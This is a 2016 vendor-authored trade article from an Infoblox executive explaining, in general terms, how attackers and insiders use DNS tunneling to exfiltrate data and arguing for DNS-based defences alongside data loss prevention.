Stop DNS-based data exfiltration

DNS can be abused in all sorts of unconventional ways that make it the perfect back door for hackers seeking to steal sensitive data.

Tags: Domain nameInfoblox (
  • E-Mail
Stop DNS-based data exfiltration Cherif Sleiman, general manager, Middle East at Infoblox.
By  Cherif Sleiman Published  May 22, 2016

Theft of sensitive or regulated data and intellectual property is one of the most serious risks to an enterprise. DNS is frequently used as a pathway for data exfiltration, because it is not inspected by common security products such as firewalls, intrusion detection systems (IDSs), and proxies.

Several high-profile data breaches have been in the news recently. Most enterprises have multiple defence mechanisms in place, such as next-generation firewalls, intrusion detection systems (IDSs), and intrusion-prevention systems (IPSs). Yet, malicious actors find a way to appropriate data.

So what types of data are being stolen? They vary and may include personally identifiable information (PII) such as Emirates ID numbers in UAE for example; regulated data related to Payment Card Industry Data Security Standard (PCI DDS); intellectual property that gives an organization a competitive advantage and; other sensitive information such as credit card numbers, company financials, payroll information, and emails.

Motivations vary from hacktivism and espionage to financial wrongdoing, where the data can be easily sold for a neat profit in the underground market. When sensitive information is stolen, it causes financial and legal woes, not to mention the huge negative impact to brand. According to a Ponemon Institute study in 2015, the average consolidated cost of a data breach is US$3.8 million, which includes investigative and forensic efforts and resolution and consequences of customer defection. This is an average—recent breaches have cost victims a lot more.

Hackers can use multiple pathways to steal data, but the one that is often unknowingly left open is DNS. DNS is increasingly being used for data exfiltration, either by malware-infected devices or by rogue employees. The nature of the DNS protocol, which was invented more than 30 years ago, is such that it is trusted, yet vulnerable to hackers and malicious insiders.

DNS tunneling is the tunneling of IP protocol traffic through Port 53—which is often not even inspected by firewalls, even next-generation firewalls—most likely for purposes of data exfiltration. Malicious insiders either establish a DNS tunnel from within the network, then encrypt and embed chunks of data in DNS queries. Data is decrypted at the other end and put back together to get the valuable information.

DNS is not only used for data leakage, but also to move malicious code into a network.

Don’t become the next data breach victim

DNS is the perfect enforcement point to improve your organisation’s security posture. It is close to endpoints, ubiquitous, and in the path of DNS-based exfiltration. While DLP technology solutions protect against data leakage via email, web, FTP, and other vectors, most don’t have visibility into DNS-based exfiltration. To maximize your chances of fighting back against these data theft attempts, complement traditional data loss prevention protection with a DNS- based solution.

Add a Comment

Your display name This field is mandatory

Your e-mail address This field is mandatory (Your e-mail address won't be published)

Security code